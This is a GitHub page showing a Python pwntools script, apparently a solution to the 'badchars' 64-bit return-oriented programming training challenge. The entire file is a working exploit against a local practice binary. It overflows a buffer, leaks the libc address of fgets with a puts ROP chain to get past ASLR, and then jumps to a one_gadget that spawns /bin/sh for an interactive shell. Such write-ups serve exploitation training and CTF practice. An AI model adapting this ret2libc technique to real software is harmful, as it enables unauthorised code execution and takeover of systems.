-
Notifications
You must be signed in to change notification settings - Fork 1
/
badchar64.py
72 lines (49 loc) · 1.21 KB
/
badchar64.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#import pwntools
from pwn import *
#initialize the process
target=process('./badchars')
#define the elf used
elf=ELF('./badchars')
#find the libc used by the elf
libc=elf.libc
#print initial data
print(target.recvuntil("s\n> "))
#construct first ROPchain
#initial payload
payload="A"*40
#gadgets,got and plt values
poprdi=0x400b39
poprsir15=0x400b41
fgets_got=0x601048
system_plt=0x4006f0
puts_plt=0x4006e0
pwnme=0x4008f5
one_gadget=0xe652b
#leak address of fgets in randomized libc
payload+=p64(poprdi)
payload+=p64(fgets_got)
payload+=p64(puts_plt)
#return to pwnme
payload+=p64(pwnme)
payload+=p64(0x0)
#send first payload
target.sendline(payload)
#recv the leak and unpack as a 64-bit address
leak=target.recvuntil("\x0a")
leak=leak.strip("\x0a")
libc_fgets=u64(leak+"\x00"*(8-len(leak)))
#get libc base address and address of execve("/bin/sh",NULL,NULL)
libc_base=libc_fgets-libc.symbols["fgets"]
libc_gadget=libc_base+one_gadget
#print libc addresses
print(hex(libc_fgets))
print(hex(libc_base))
#second ROPchain
#initial payload
payload="A"*40
# call execve("/bin/sh",NULL,NULL)
payload+=p64(libc_gadget)
#send the second payload
target.sendline(payload)
#interact with the spawned shell
target.interactive()